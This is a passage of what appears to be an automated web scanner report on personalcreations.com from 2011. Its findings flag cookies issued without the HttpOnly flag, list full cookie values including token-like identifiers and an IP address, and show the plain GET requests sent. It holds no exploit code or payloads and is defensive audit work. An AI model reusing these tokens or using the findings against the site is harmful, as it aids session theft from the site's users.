12.4. http://www.personalcreations.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.5. http://www.personalcreations.com/apparel-gifts-her-PHERAPP previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/apparel-gifts-her-PHERAPP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.6. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/grandparents-day-gifts-PGDPDAY

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.7. http://www.personalcreations.com/halloween-home-decorations-PHALHOM previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/halloween-home-decorations-PHALHOM

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.8. http://www.personalcreations.com/just-because-gifts-PJBEBSL previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/just-because-gifts-PJBEBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.9. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-anniversary-gifts-PANNBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.10. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-back-to-school-gifts-PBKDB2S

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.11. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-birthday-gifts-PBIRBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.12. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-birthday-gifts-her-PHERBIR

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.13. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-business-gifts-PBIZGFT

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.14. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-christmas-gifts-PCHRBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.15. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-communion-gifts-PCOMMUN

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.16. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-congratulations-gifts-PCONGRA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.17. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-graduation-gifts-PGRADUA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.18. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-clothes-PHALAPP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.19. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-gifts-PHALLOW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.20. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-halloween-treat-bags-PHALBAG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.21. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-housewarming-gifts-PHOUSEW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.22. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-pet-gifts-PPETBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.23. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/personalized-romantic-gifts-PLARBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
